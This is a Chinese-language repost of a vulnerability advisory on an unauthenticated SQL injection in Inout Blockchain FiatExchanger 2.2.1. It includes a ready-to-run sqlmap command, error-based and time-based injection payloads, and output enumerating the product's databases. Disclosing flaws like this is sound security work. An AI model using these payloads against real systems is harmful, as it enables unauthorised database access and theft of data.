区块链 FiatExchanger 2.2.1 SQL 注入

admin 2022年5月26日02:43:41安全文章评论7 views2786字阅读9分17秒阅读模式
5月25日-漏洞公告

信息

Vulnerability Name  : Remote Blind SQL Injections in Inout Blockchain FiatExchangerProduct             : Inout Blockchain FiatExchangerversion             : 2.2.1Date                : 2022-05-21Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/Exploit Detail      : https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.mdCVE-Number          : In ProgessExploit Author      : Mohamed N. Ali @MohamedNab1l


漏洞参数:symbol (GET)

Blockchain FiatExchanger v2.2.1平台发现SQL注入攻击。这将允许远程未经身份验证的攻击者注入 SQL 代码。这可能导致全面的信息披露。


漏洞文件:

/application/third_party/Chart/TradingView/chart_content/master.php 第 130 行


Sqlmap 命令:

python sqlmap.py -u "http://http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db --dbs --current-user

输出:

` [20:05:54] [INFO] 从文件 '/root/sqlmap/data/txt/user-agents.txt ' [20:05:55] [INFO] 测试与目标 URL 的连接 [20:05:55] [WARNING] 在 HTTP 响应正文中发现 DBMS 错误,这可能会干扰测试结果 sqlmap 恢复了来自存储会话的以下注入点:

Parameter: symbol (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU

Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))kVcR) AND 'JGrB'='JGrB

[20:05:55] [INFO] testing MySQL [20:05:56] [INFO] confirming MySQL [20:05:57] [INFO] the back-end DBMS is MySQL [20:05:57] [INFO] fetching banner [20:05:57] [INFO] resumed: '5.6.50' web application technology: PHP 7.0.33 back-end DBMS: MySQL >= 5.0.0 banner: '5.6.50' [20:05:57] [INFO] fetching current user [20:05:57] [INFO] retrieved: '[email protected]' current user: '[email protected]' [20:05:57] [INFO] fetching current database [20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db' current database: 'inout_blockchain_fiatexchanger_db' [20:05:57] [INFO] fetching database names [20:05:57] [INFO] resumed: 'information_schema' [20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_addons_db' [20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_cryptotrading_db' [20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db' [20:05:57] [INFO] resumed: 'mysql' [20:05:57] [INFO] resumed: 'performance_schema' available databases [6]: [] information_schema [] inout_blockchain_fiatexchanger_addons_db [] inout_blockchain_fiatexchanger_cryptotrading_db [] inout_blockchain_fiatexchanger_db [] mysql [] performance_schema

区块链 FiatExchanger 2.2.1 SQL 注入

区块链 FiatExchanger 2.2.1 SQL 注入

时间线

2022-05-03: Discovered the bug2022-05-03: Reported to vendor2022-05-21: Advisory published

发现者

Mohamed N. Ali@MohamedNab1lali.mohamed@gmail.com

文章引用

  • https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md

原文始发于微信公众号(Ots安全):区块链 FiatExchanger 2.2.1 SQL 注入

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月26日02:43:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  区块链 FiatExchanger 2.2.1 SQL 注入 https://cn-sec.com/archives/1050161.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: